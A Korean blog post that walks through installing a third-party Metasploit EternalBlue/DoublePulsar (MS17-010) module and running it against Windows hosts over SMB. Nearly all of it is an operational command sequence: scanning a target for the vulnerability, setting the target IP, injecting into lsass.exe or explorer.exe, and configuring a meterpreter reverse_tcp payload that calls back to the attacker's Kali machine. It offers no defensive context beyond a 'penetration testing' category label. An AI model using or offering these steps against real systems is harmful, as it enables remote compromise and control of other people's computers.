본문 바로가기
2. 시스템 해킹 및 모의 해킹

메타스플로잇 모듈 [eternerblue,doublepulsar]

by Robert8478 2023. 12. 28.

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

 

GitHub - Telefonica/Eternalblue-Doublepulsar-Metasploit: Module of Metasploit to exploit the vulnerability Eternalblue-Doublepul

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar. - GitHub - Telefonica/Eternalblue-Doublepulsar-Metasploit: Module of Metasploit to exploit the vulnerability Eternalblue-...

github.com

[설치법]
git clone으로 받아주면 .rb 파일로 된 모듈이 있는데 이 모듈을 메타스플로잇 모듈 폴더로 옮겨준다.
cd Eternal...
cp eternal...rb /usr/share/metasploit-framwork/modules/exploits/windows/smb/


이터널 블루를 사용하기 전
use auxiliary/scanner/smb/smb_ms17_010 모듈을 사용해서 해당 취약점이 있는지 스캔한다.
[rhosts를 타겟 아이피로 설정 후 스캐닝시 likely vulnarable... 이 뜨면 취약한것]


[사용법]
>reload_all - 추가한 모듈을 실질적으로 쓸수 있게 불러온다.
>use exploit/windows/smb/eternalblue_doublepursar
>show options
>set doublepursarpath [모듈설치폴더 내부 deps 폴더 경로] - 설치한 폴더 안에 deps폴더로 경로를 지정, 폴더를 드래그해서 터미널에 옮겨주면 빠르게 경로 지정 가능
>set eterbalbluepath [위와같음]
>set processinject lsass.exe - 어떤 프로세스로 바이러스를 실행할건지 여부, x86을 해킹하는 경우 explorer.exe 사용하는게 좋음
>set rhosts [타겟 아이피]
>show targets - 타겟 pc 운영체제 선택
>set target - 타겟 pc 운영체제로
>set payload [페이로드] - 페이로드 설정 ex) windows/meterpreter/reverse_tcp
>set lhost [칼리 아이피]
>exploit